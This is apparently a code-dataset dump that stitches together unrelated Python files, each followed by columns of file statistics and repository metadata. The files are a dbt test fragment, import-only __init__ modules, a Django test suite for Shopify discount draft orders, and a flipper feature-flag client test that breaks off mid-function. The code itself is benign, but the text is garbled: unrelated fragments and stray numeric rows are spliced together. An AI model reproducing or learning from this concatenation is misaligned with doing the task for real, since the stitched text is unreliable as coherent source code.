return os.path.normpath(path)
@property
def models(self):
return self.dir("duplicate_docs")
@use_profile('postgres')
def test_postgres_duplicate_doc_ref(self):
with self.assertRaises(dbt.exceptions.CompilationException):
self.run_dbt(expect_pass=False)
| 28.223464
| 74
| 0.548496
| 509
| 5,052
| 5.280943
| 0.194499
| 0.066964
| 0.047619
| 0.046875
| 0.864583
| 0.864583
| 0.852307
| 0.80878
| 0.80878
| 0.743304
| 0
| 0.00472
| 0.328979
| 5,052
| 178
| 75
| 28.382022
| 0.788201
| 0.025139
| 0
| 0.684932
| 0
| 0
| 0.182853
| 0.017879
| 0
| 0
| 0
| 0
| 0.123288
| 1
| 0.123288
| false
| 0.013699
| 0.027397
| 0.082192
| 0.260274
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e04af1250bea305be2915269d83f457ea7b8c545
| 81
|
py
|
Python
|
reaver/__init__.py
|
HatsuneMiku4/reaver
|
059320ce109498ec4100fcc2cee32177c427f1ea
|
[
"MIT"
] | 239
|
2019-01-18T08:47:24.000Z
|
2022-03-21T08:29:50.000Z
|
reaver/__init__.py
|
HatsuneMiku4/reaver
|
059320ce109498ec4100fcc2cee32177c427f1ea
|
[
"MIT"
] | 19
|
2019-01-27T10:10:12.000Z
|
2021-12-29T20:02:05.000Z
|
reaver/__init__.py
|
HatsuneMiku4/reaver
|
059320ce109498ec4100fcc2cee32177c427f1ea
|
[
"MIT"
] | 44
|
2019-01-18T02:12:46.000Z
|
2021-07-28T14:54:10.000Z
|
import reaver.envs
import reaver.models
import reaver.agents
import reaver.utils
| 16.2
| 20
| 0.851852
| 12
| 81
| 5.75
| 0.5
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 4
| 21
| 20.25
| 0.945205
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0ebdf814a103c9f0a39a556a56a4469cf9d61c95
| 27,601
|
py
|
Python
|
django_toolbox/discounts/tests/test_discount_basic.py
|
stlk/django-toolbox
|
146abdae59f7b27be7aaddce611faea91a0d4b69
|
[
"MIT"
] | 2
|
2019-10-03T13:37:01.000Z
|
2020-07-02T11:43:20.000Z
|
django_toolbox/discounts/tests/test_discount_basic.py
|
stlk/django-toolbox
|
146abdae59f7b27be7aaddce611faea91a0d4b69
|
[
"MIT"
] | 7
|
2018-11-10T12:44:58.000Z
|
2021-09-22T17:50:59.000Z
|
django_toolbox/discounts/tests/test_discount_basic.py
|
stlk/django-toolbox
|
146abdae59f7b27be7aaddce611faea91a0d4b69
|
[
"MIT"
] | null | null | null |
import copy
from unittest.mock import patch
from django.conf import settings
import responses
from django_toolbox.apps.billing.tests import ShopifyViewTest
from ...shopify_graphql_test import mock_response
from ..collections import DraftOrderResponse
from ..draft_order import create_draft_order
APP_NAME = settings.APP_NAME
PRODUCTS_IN_COLLECTIONS = {
"_159609389100": {
"_4413823025196": True,
"_4413823025195": True,
"_4413823025197": False,
}
}
AMOUNT_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": {"greaterThanOrEqualToSubtotal": {"amount": "30.0"}},
"customerGets": {
"items": {"allItems": True},
"value": {"amount": {"amount": "20.0"}, "appliesOnEachItem": False},
},
}
}
}
AMOUNT_DISCOUNT_DATA_MIN_REQUIREMENTS_AMOUNT_FAIL = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": {
"greaterThanOrEqualToSubtotal": {"amount": "3000000.0"}
},
"customerGets": {
"items": {"allItems": True},
"value": {"amount": {"amount": "20.0"}, "appliesOnEachItem": False},
},
}
}
}
COLLECTIONS_FIXED_AMOUNT_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": None,
"customerGets": {
"items": {
"collections": {
"edges": [
{"node": {"id": "gid://shopify/Collection/159609389100"}}
]
}
},
"value": {"amount": {"amount": "10.0"}, "appliesOnEachItem": False},
},
}
}
}
CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": {"greaterThanOrEqualToQuantity": "2"},
"customerGets": {
"items": {
"products": {
"edges": [
{"node": {"id": "gid://shopify/Product/4413823025196"}},
{"node": {"id": "gid://shopify/Product/4413823156268"}},
]
}
},
"value": {"amount": {"amount": "70.0"}, "appliesOnEachItem": False},
},
}
}
}
CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA_MIN_REQUIREMENTS_QUANTITY_FAIL = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": {"greaterThanOrEqualToQuantity": "10"},
"customerGets": {
"items": {
"products": {
"edges": [
{"node": {"id": "gid://shopify/Product/4413823025196"}},
{"node": {"id": "gid://shopify/Product/4413823156268"}},
]
}
},
"value": {"amount": {"amount": "70.0"}, "appliesOnEachItem": False},
},
}
}
}
CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA_APPLIES_ON_EACH_ITEM = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": None,
"customerGets": {
"items": {
"products": {
"edges": [
{"node": {"id": "gid://shopify/Product/4413823025196"}},
{"node": {"id": "gid://shopify/Product/4413823156268"}},
]
}
},
"value": {"amount": {"amount": "70.0"}, "appliesOnEachItem": True},
},
}
}
}
PERCENTAGE_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": {"greaterThanOrEqualToQuantity": "2"},
"customerGets": {
"items": {"allItems": True},
"value": {"percentage": 0.2, "appliesOnEachItem": False},
},
}
}
}
CUSTOMER_GETS_ITEMS_PERCENTAGE_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": None,
"customerGets": {
"items": {
"products": {
"edges": [
{"node": {"id": "gid://shopify/Product/4413823025196"}},
{"node": {"id": "gid://shopify/Product/4413823156268"}},
]
}
},
"value": {"percentage": 0.3, "appliesOnEachItem": False},
},
}
}
}
CUSTOMER_GETS_VARIANTS_PERCENTAGE_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": None,
"customerGets": {
"items": {
"productVariants": {
"edges": [
{
"node": {
"id": "gid://shopify/ProductVariant/31547677245484"
}
},
{
"node": {
"id": "gid://shopify/ProductVariant/31547677278252"
}
},
]
}
},
"value": {"percentage": 0.5, "appliesOnEachItem": False},
},
}
}
}
COLLECTIONS_PERCENTAGE_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": None,
"customerGets": {
"items": {
"collections": {
"edges": [
{"node": {"id": "gid://shopify/Collection/159609389100"}}
]
}
},
"value": {"percentage": 0.7, "appliesOnEachItem": False},
},
}
}
}
VARIABLES_INPUT = {
"input": {
"lineItems": [
{
"quantity": 2,
"variantId": "gid://shopify/ProductVariant/17744973103175",
"customAttributes": None,
"appliedDiscount": None,
}
],
"tags": APP_NAME,
"note": "",
"appliedDiscount": None,
"shippingAddress": None,
"metafields": [],
}
}
MULTIPLE_VARIABLES_INPUT = {
"input": {
"lineItems": [
{
"quantity": 2,
"variantId": "gid://shopify/ProductVariant/17744973103175",
"customAttributes": None,
"appliedDiscount": None,
},
{
"quantity": 1,
"variantId": "gid://shopify/ProductVariant/17744973103171",
"customAttributes": None,
"appliedDiscount": None,
},
{
"quantity": 1,
"variantId": "gid://shopify/ProductVariant/17744973103172",
"customAttributes": None,
"appliedDiscount": None,
},
],
"tags": APP_NAME,
"note": "",
"appliedDiscount": None,
"shippingAddress": None,
"metafields": [],
}
}
DRAFT_ORDER_CREATE_RESPONSE = DraftOrderResponse(
id=123, invoice_url="http://example.com/"
)
def get_offers_line_items(shop, data):
return [], []
class CreateDraftOrderDiscountBasicViewTest(ShopifyViewTest):
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_all_items(self, execute_mock):
mock_response(AMOUNT_DISCOUNT_DATA)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 17_744_973_103_175,
"properties": None,
"price": 25000,
"product_id": 4413820174380,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "20FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["appliedDiscount"] = {
"title": "20FIXEDOFF",
"value": 20.0,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_all_items_fail_min_requirements_amount(
self, execute_mock
):
mock_response(AMOUNT_DISCOUNT_DATA_MIN_REQUIREMENTS_AMOUNT_FAIL)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 17_744_973_103_175,
"properties": None,
"price": 25000,
"product_id": 4413820174380,
}
],
"currency": "CZK",
"total_price": 5000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "20FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["appliedDiscount"] = {
"title": "20FIXEDOFF",
"value": 20.0,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertNotEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_collections(self, execute_mock):
mock_response(COLLECTIONS_FIXED_AMOUNT_DISCOUNT_DATA)
mock_response(PRODUCTS_IN_COLLECTIONS)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
},
{
"quantity": 1,
"variant_id": 31547677245485,
"properties": None,
"price": 10000,
"product_id": 4413823025195,
},
{
"quantity": 1,
"variant_id": 31547677245487,
"properties": None,
"price": 10000,
"product_id": 4413823025197,
},
],
"currency": "CZK",
"total_price": 50000,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "10FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(MULTIPLE_VARIABLES_INPUT)
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "10FIXEDOFF",
"value": 3.33,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["lineItems"][1]["appliedDiscount"] = {
"title": "10FIXEDOFF",
"value": 3.33,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["lineItems"][1][
"variantId"
] = "gid://shopify/ProductVariant/31547677245485"
expected_input["input"]["lineItems"][2][
"variantId"
] = "gid://shopify/ProductVariant/31547677245487"
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_percentage_all_items(self, execute_mock):
mock_response(PERCENTAGE_DISCOUNT_DATA)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 17_744_973_103_175,
"properties": None,
"price": 25000,
"product_id": 4413820174380,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "20PERCENTOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["appliedDiscount"] = {
"title": "20PERCENTOFF",
"value": 20,
"valueType": "PERCENTAGE",
}
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_customer_gets_items(self, execute_mock):
mock_response(CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "70FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "70FIXEDOFF",
"value": 35.0,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["appliedDiscount"] = None
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_customer_gets_items_min_requirements_quantity_fail(
self, execute_mock
):
mock_response(
CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA_MIN_REQUIREMENTS_QUANTITY_FAIL
)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "70FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "70FIXEDOFF",
"value": 70.0,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["appliedDiscount"] = None
self.maxDiff = None
self.assertNotEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_customer_gets_items_applies_on_each_item(
self, execute_mock
):
mock_response(CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA_APPLIES_ON_EACH_ITEM)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "70FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "70FIXEDOFF",
"value": 70.0,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["appliedDiscount"] = None
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_percentage_customer_gets_items(self, execute_mock):
mock_response(CUSTOMER_GETS_ITEMS_PERCENTAGE_DISCOUNT_DATA)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "30PERCENTOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "30PERCENTOFF",
"value": 30,
"valueType": "PERCENTAGE",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["appliedDiscount"] = None
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_percentage_customer_gets_variants(self, execute_mock):
mock_response(CUSTOMER_GETS_VARIANTS_PERCENTAGE_DISCOUNT_DATA)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
},
{
"quantity": 1,
"variant_id": 31547677278252,
"properties": None,
"price": 30000,
"product_id": 4413823156268,
},
],
"currency": "CZK",
"total_price": 80000,
"item_count": 3,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "50PERCENTOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["lineItems"] = [
{
"quantity": 2,
"variantId": "gid://shopify/ProductVariant/31547677245484",
"customAttributes": None,
"appliedDiscount": {
"title": "50PERCENTOFF",
"value": 50,
"valueType": "PERCENTAGE",
},
},
{
"quantity": 1,
"variantId": "gid://shopify/ProductVariant/31547677278252",
"customAttributes": None,
"appliedDiscount": {
"title": "50PERCENTOFF",
"value": 50,
"valueType": "PERCENTAGE",
},
},
]
expected_input["input"]["appliedDiscount"] = None
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_percentage_collections(self, execute_mock):
mock_response(COLLECTIONS_PERCENTAGE_DISCOUNT_DATA)
mock_response(PRODUCTS_IN_COLLECTIONS)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
}
],
"currency": "CZK",
"total_price": 50000,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "70PERCENTOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "70PERCENTOFF",
"value": 70,
"valueType": "PERCENTAGE",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
| 33.991379
| 94
| 0.480019
| 1,959
| 27,601
| 6.476263
| 0.086269
| 0.055332
| 0.048238
| 0.034051
| 0.904627
| 0.885552
| 0.873493
| 0.855206
| 0.839994
| 0.805549
| 0
| 0.062871
| 0.395493
| 27,601
| 811
| 95
| 34.033292
| 0.697513
| 0
| 0
| 0.649007
| 0
| 0
| 0.25807
| 0.073621
| 0
| 0
| 0
| 0
| 0.013245
| 1
| 0.01457
| false
| 0
| 0.010596
| 0.001325
| 0.027815
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1624cd5f0ff1118325044b8c8dd5cf7e9849dc3e
| 41
|
py
|
Python
|
pylanelet2/lanelet2/geometry.py
|
yuzhangbit/Lanelet2
|
62b8de59882b80efb94b419f7277c64a00fec9b4
|
[
"BSD-3-Clause"
] | 3
|
2019-01-14T07:05:36.000Z
|
2020-02-26T16:20:21.000Z
|
pylanelet2/lanelet2/geometry.py
|
stefanosecondo-tomtom/Lanelet2
|
88fc2d1b9292c40f64e6d47ca4c7b23da52bda7b
|
[
"BSD-3-Clause"
] | null | null | null |
pylanelet2/lanelet2/geometry.py
|
stefanosecondo-tomtom/Lanelet2
|
88fc2d1b9292c40f64e6d47ca4c7b23da52bda7b
|
[
"BSD-3-Clause"
] | 1
|
2022-03-28T21:38:14.000Z
|
2022-03-28T21:38:14.000Z
|
from liblanelet2_geometry_pyapi import *
| 20.5
| 40
| 0.878049
| 5
| 41
| 6.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027027
| 0.097561
| 41
| 1
| 41
| 41
| 0.891892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1645b3eb15f35878ff54bdd8a49195c777ab5e11
| 66
|
py
|
Python
|
robocode-vscode/tests/robocode_vscode_tests/__init__.py
|
emanlove/robotframework-lsp
|
b0d8862d24e3bc1b72d8ce9412a671571520e7d9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
robocode-vscode/tests/robocode_vscode_tests/__init__.py
|
emanlove/robotframework-lsp
|
b0d8862d24e3bc1b72d8ce9412a671571520e7d9
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-30T15:40:29.000Z
|
2021-09-30T15:40:29.000Z
|
robocode-vscode/tests/robocode_vscode_tests/__init__.py
|
emanlove/robotframework-lsp
|
b0d8862d24e3bc1b72d8ce9412a671571520e7d9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import robocode_vscode
robocode_vscode.import_robocode_ls_core()
| 16.5
| 41
| 0.893939
| 9
| 66
| 6
| 0.555556
| 0.518519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060606
| 66
| 3
| 42
| 22
| 0.870968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
16887b95ec3ad967cf54868c034f60cdf09b3d0e
| 167
|
py
|
Python
|
tests/test_encode.py
|
oscekh/repobee-encode
|
3e5dff25eec39578f9b3c240fec5c90861a12133
|
[
"MIT"
] | null | null | null |
tests/test_encode.py
|
oscekh/repobee-encode
|
3e5dff25eec39578f9b3c240fec5c90861a12133
|
[
"MIT"
] | null | null | null |
tests/test_encode.py
|
oscekh/repobee-encode
|
3e5dff25eec39578f9b3c240fec5c90861a12133
|
[
"MIT"
] | null | null | null |
from _repobee import plugin
from repobee_encode import encode
def test_register():
"""Just test that there is no crash"""
plugin.register_plugins([encode])
| 18.555556
| 42
| 0.742515
| 23
| 167
| 5.217391
| 0.652174
| 0.183333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173653
| 167
| 8
| 43
| 20.875
| 0.869565
| 0.191617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
16cf8986165be95d7c042053edc8404c0c0702db
| 20,484
|
py
|
Python
|
tests/test_client.py
|
rusintez/flipper-client
|
cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0
|
[
"Apache-2.0"
] | null | null | null |
tests/test_client.py
|
rusintez/flipper-client
|
cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0
|
[
"Apache-2.0"
] | null | null | null |
tests/test_client.py
|
rusintez/flipper-client
|
cd00ae1a3582c5cb7e661c5aa9b8a7b65b35a9e0
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from unittest.mock import MagicMock
from uuid import uuid4
from flipper import Condition, FeatureFlagClient, MemoryFeatureFlagStore
from flipper.bucketing import Percentage, PercentageBucketer
from flipper.contrib.storage import FeatureFlagStoreMeta
from flipper.events import EventType, FlipperEventEmitter
from flipper.exceptions import FlagDoesNotExistError
from flipper.flag import FeatureFlag
class BaseTest(unittest.TestCase):
def setUp(self):
self.store = MemoryFeatureFlagStore()
self.client = FeatureFlagClient(self.store)
def txt(self):
return uuid4().hex
class TestIsEnabled(BaseTest):
def test_returns_true_when_feature_enabled(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.enable(feature_name)
self.assertTrue(self.client.is_enabled(feature_name))
def test_returns_false_when_feature_disabled(self):
feature_name = self.txt()
self.client.create(feature_name)
self.client.disable(feature_name)
self.assertFalse(self.client.is_enabled(feature_name))
def test_returns_false_when_feature_does_not_exist(self):
feature_name = self.txt()
self.assertFalse(self.client.is_enabled(feature_name))
def test_returns_true_if_condition_specifies(self):
feature_name = self.txt()
self.client.create(feature_name, is_enabled=True)
self.client.add_condition(feature_name, Condition(foo=True))
self.assertTrue(self.client.is_enabled(feature_name, foo=True))
def test_returns_false_if_condition_specifies(self):
feature_name = self.txt()
self.client.create(feature_name, is_enabled=True)
self.client.add_condition(feature_name, Condition(foo=True))
self.assertFalse(self.client.is_enabled(feature_name, foo=False))
def test_returns_false_if_feature_disabled_despite_condition(self):
feature_name = self.txt()
self.client.create(feature_name, is_enabled=False)
self.client.add_condition(feature_name, Condition(foo=True))
self.assertFalse(self.client.is_enabled(feature_name, foo=True))
def test_returns_false_if_bucketer_check_returns_false(self):
feature_name = self.txt()
bucketer = MagicMock()
bucketer.check.return_value = False
self.client.create(feature_name, is_enabled=True)
self.client.set_bucketer(feature_name, bucketer)
self.assertFalse(self.client.is_enabled(feature_name))
def test_returns_true_if_bucketer_check_returns_true(self):
feature_name = self.txt()
bucketer = MagicMock()
bucketer.check.return_value = True
self.client.create(feature_name, is_enabled=True)
self.client.set_bucketer(feature_name, bucketer)
self.assertTrue(self.client.is_enabled(feature_name))
def test_forwards_conditions_to_bucketer(self):
feature_name = self.txt()
bucketer = MagicMock()
self.client.create(feature_name, is_enabled=True)
